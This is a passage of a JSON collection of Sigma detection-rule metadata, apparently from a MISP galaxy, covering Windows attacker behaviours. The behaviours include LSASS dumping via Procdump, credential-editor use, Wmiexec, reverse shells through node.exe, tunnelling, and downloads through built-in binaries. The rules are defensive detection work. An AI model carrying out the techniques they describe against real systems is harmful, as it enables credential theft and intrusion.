Anhaus, Tony Lambert, oscd.community, omkar72", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate use of the utilities by legitimate user for legitimate reason" ], "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1482" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", "value": "Domain Trust Discovery Via Dsquery" }, { "description": "Detects potentially suspicious child processes of KeyScrambler.exe", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-05-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_keyscrambler_susp_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/DTCERT/status/1712785421845790799", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_keyscrambler_susp_child_process.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1203", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca5583e9-8f80-46ac-ab91-7f314d13b984", "value": "Potentially Suspicious Child Process of KeyScrambler.exe" }, { "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", "meta": { "author": "Thomas Patzke", "creation_date": "2020-05-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", "https://github.com/byt3bl33d3r/CrackMapExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027.005" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", "value": "HackTool - CrackMapExec PowerShell Obfuscation" }, { "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", "meta": { "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate usage by software developers/testers" ], "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mattifestation/status/1196390321783025666", "https://twitter.com/oulusoyum/status/1191329746069655553", "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" ], "tags": [ "attack.defense-evasion", "attack.credential-access", "attack.t1218", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "value": "Time Travel Debugging Utility Usage" }, { "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process.\nThis way we are also able to catch cases in which the attacker has renamed the procdump executable.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-10-30", "falsepositive": [ "Unlikely, because no one should dump an lsass process memory", "Another tool that uses command line flags similar to ProcDump" ], "filename": "proc_creation_win_sysinternals_procdump_lsass.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://learn.microsoft.com/en-us/sysinternals/downloads/procdump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.credential-access", "attack.t1003.001", "car.2013-05-009" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", "value": "Potential LSASS Process Dump Via Procdump" }, { "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021" ] }, "related": [ { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f", "value": "Potential Remote Desktop Tunneling" }, { "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY 
.NET Application\nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", "meta": { "author": "Sreeman", "creation_date": "2020-01-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_task_folder_evasion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", "https://twitter.com/subTee/status/1216465628946563073", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.execution", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", "value": "Tasks Folder Evasion" }, { "description": "Detects a service binary running in a suspicious directory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-03-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_service_dir.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", "value": "Suspicious Service Binary Directory" }, { "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be 
renamed)", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_winrm_awl_bypass.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl" }, { "description": "Detects usage of winget to add new additional download sources", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "False positive are expected with legitimate sources" ], "filename": "proc_creation_win_winget_add_custom_source.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "value": "Add New Download Source To Winget" }, { "description": "Detects uncommon 
child processes spawning from \"sigverif.exe\", which could indicate potential abuse of the latter as a living-off-the-land binary in order to proxy execution.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sigverif_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", "https://twitter.com/0gtweet/status/1457676633809330184", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sigverif_uncommon_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", "value": "Uncommon Sigverif.EXE Child Process" }, { "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-08", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml" ], "tags": [ "attack.defense-evasion", "attack.lateral-movement" ] }, "uuid": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", "value": "HackTool - Wmiexec Default Powershell Command" }, { "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service 
on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", "meta": { "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "creation_date": "2022-02-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_rdp_keys_tamper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.lateral-movement", "attack.t1021.001", "attack.t1112" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536", "value": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE" }, { "description": "Detects the execution of node.exe, which is shipped with multiple software such as VMware, Adobe, etc., in order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_node_abuse.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", "https://nodejs.org/api/cli.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", "value": "Potential Arbitrary Code Execution Via Node.EXE" }, { "description": "Detects potentially suspicious file downloads directly from IP addresses using curl.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_download_direct_ip_susp_extensions.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml" ], "tags": [ "attack.execution" ] }, "uuid": 
"5cb299fc-5fb1-4d07-b989-0644c68b6043", "value": "Suspicious File Download From IP Via Curl.EXE" }, { "description": "Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.", "meta": { "author": "Muhammad Faisal", "creation_date": "2023-08-02", "falsepositive": [ "Legitimate activity of system administrators" ], "filename": "proc_creation_win_ssm_agent_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan", "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/", "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml" ], "tags": [ "attack.command-and-control", "attack.persistence", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d20ee2f4-822c-4827-9e15-41500b1fff10", "value": "Potential Amazon SSM Agent Hijacking" }, { "description": "Detects Visual Studio Code tunnel execution. 
Attackers can abuse this functionality to establish a C2 channel", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), citron_ninja", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate use of Visual Studio Code tunnel" ], "filename": "proc_creation_win_vscode_tunnel_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://code.visualstudio.com/docs/remote/tunnels", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90d6bd71-dffb-4989-8d86-a827fedd6624", "value": "Visual Studio Code Tunnel Execution" }, { "description": "Detects suspicious launch of a renamed version of the PSEXESVC service, which is not often used by legitimate administrators", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate administrative tasks" ], "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml" ], "tags": [ "attack.execution" ] }, "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", "value": "Renamed PsExec Service Execution" }, { "description": "Detects the stopping of a Windows service via the PowerShell Cmdlet \"Stop-Service\"", "meta": { "author": 
"Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-05", "falsepositive": [ "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], "filename": "proc_creation_win_powershell_stop_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_stop_service.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c49c5062-0966-4170-9efd-9968c913a6cf", "value": "Stop Windows Service Via PowerShell Stop-Service" }, { "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_malicious_cmdlets.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/adrecon/ADRecon", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/samratashok/nishang", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", 
"https://github.com/adrecon/AzureADRecon", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/besimorhino/powercat", "https://github.com/HarmJ0y/DAMP", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://adsecurity.org/?p=2921", "https://github.com/DarkCoderSc/PowerRunAsSystem/", "https://github.com/calebstewart/CVE-2021-1675", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml" ], "tags": [ "attack.execution", "attack.discovery", "attack.t1482", "attack.t1087", "attack.t1087.001", "attack.t1087.002", "attack.t1069.001", "attack.t1069.002", "attack.t1069", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" 
], "type": "related-to" }, { "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02030f2f-6199-49ec-b258-ea71b07e03dc", "value": "Malicious PowerShell Commandlets - ProcessCreation" }, { "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "creation_date": "2017-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_webshell_recon_commands_and_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml" ], "tags": [ "attack.persistence", "attack.t1505.003", "attack.t1018", "attack.t1033", "attack.t1087" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"bed2a484-9348-4143-8a8a-b801c979301c", "value": "Webshell Detection With Command Line Keywords" }, { "description": "Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.\n", "meta": { "author": "Joseph Kamau", "creation_date": "2024-05-27", "falsepositive": [ "Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed." ], "filename": "proc_creation_win_susp_browser_launch_from_document_reader_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/", "https://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_browser_launch_from_document_reader_process.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1193d960-2369-499f-a158-7b50a31df682", "value": "Potential Suspicious Browser Launch From Document Reader Process" }, { "description": "Detects the execution of Xwizard tool with the \"RunWizard\" flag and a GUID like argument.\nThis utility can be abused in order to run custom COM object created in the registry.\n", "meta": { "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_xwizard_runwizard_com_object_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://www.elastic.co/guide/en/security/current/execution-of-com-object-via-xwizard.html", "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", "https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xwizard_runwizard_com_object_exec.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "value": "COM Object Execution via Xwizard.EXE" }, { "description": "Detects the use of Windows Credential Editor (WCE)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-31", "falsepositive": [ "Another service that uses a single -s command line switch" ], "filename": "proc_creation_win_hktl_wce.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.ampliasecurity.com/research/windows-credentials-editor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_wce.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", "value": "HackTool - Windows Credential Editor (WCE) Execution" }, { "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-03", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": 
"proc_creation_win_desktopimgdownldr_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://twitter.com/SBousseaden/status/1278977301745741825", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "value": "Suspicious Desktopimgdownldr Command" }, { "description": "Detects the use of Windows Defender MpCmdRun.EXE to download files", "meta": { "author": "Matthew Matchen", "creation_date": "2020-09-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mpcmdrun_download_arbitrary_file.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", "value": "File Download Via Windows Defender MpCmpRun.EXE" }, { "description": "Detects 
